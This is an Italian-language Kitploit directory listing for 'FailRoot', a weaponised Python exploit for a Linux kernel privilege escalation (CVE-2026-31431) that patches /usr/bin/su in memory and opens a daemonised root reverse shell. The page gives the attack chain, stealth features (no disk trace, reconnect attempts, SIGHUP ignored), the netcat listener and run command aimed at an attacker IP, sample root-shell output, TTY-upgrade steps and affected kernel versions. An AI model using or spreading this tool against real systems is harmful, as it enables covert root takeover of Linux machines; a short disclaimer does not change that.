Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-31431-REVSHELL — Arma Python armato per CVE-2026-31431, che combina l'escalation dei privilegi del kernel Linux in una reverse shell root daemonizzata con PTY completo, applicando una patch in memoria a /usr/bin/su. | Kitploit
Strumenti/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Escalation di PrivilegiFramework di ExploitAnalisi delle VulnerabilitàExploitPost-ExploitPenetration TestingRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

Arma Python armato per CVE-2026-31431, che combina l'escalation dei privilegi del kernel Linux in una reverse shell root daemonizzata con PTY completo, applicando una patch in memoria a /usr/bin/su.

Vedi Repository
3 mesi faNon ancora revisionato


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

Panoramica

FailRoot è un exploit armato per CVE-2026-31431 — una scrittura fuori dai limiti nel sottosistema crypto: algif_aead del kernel Linux.

Combina un'escalation dei privilegi con una reverse shell root daemonizzata con PTY completo:

root@kitploit:~
AF_ALG + splice()  →  scrittura di 4 byte nella page cache  →  patch di /usr/bin/su  →  root

L'intero exploit sta in un unico file. Nessuna compilazione. Nessuna dipendenza esterna. Nessuna traccia su disco — il binario su viene patchato solo in memoria.


Cosa fa

  1. Si daemonizza istantaneamente — doppio fork, si stacca dal terminale, restituisce subito il prompt
  2. Carica i moduli del kernel — algif_aead + authencesn tramite molteplici strategie di fallback
  3. Sfrutta CVE-2026-31431 — scrive 4 byte controllati nella page cache di /usr/bin/su
  4. Genera una reverse shell root con PTY — pty.spawn("/usr/bin/su") → TTY root completamente interattivo

La reverse shell sopravvive alla chiusura del terminale (SIGHUP ignorato), non mostra alcun output sul target e si riconnette con tentativi per un massimo di 3 minuti.


Utilizzo

root@kitploit:~
# Attaccante — avvia il listener:
nc -lvnp 4444

# Target — esegui l'exploit (non apparirà nulla, si daemonizza istantaneamente):
python3 exploit.py <IP_ATTACCANTE> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

Upgrade TTY (lato attaccante, dentro la shell)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

Kernel Affetti


Requisiti

  • Python >= 3.10 (os.splice())
  • Accesso in lettura a /usr/bin/su (leggibile da tutti su tutte le distribuzioni)
  • Moduli del kernel algif_aead e authencesn disponibili
  • Nessun sudo richiesto

Autore

danimrtzp


Disclaimer

Solo per ricerca di sicurezza autorizzata e scopi educativi. L'uso improprio è illegale.

Scarica lo strumento
DaA (escluso)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6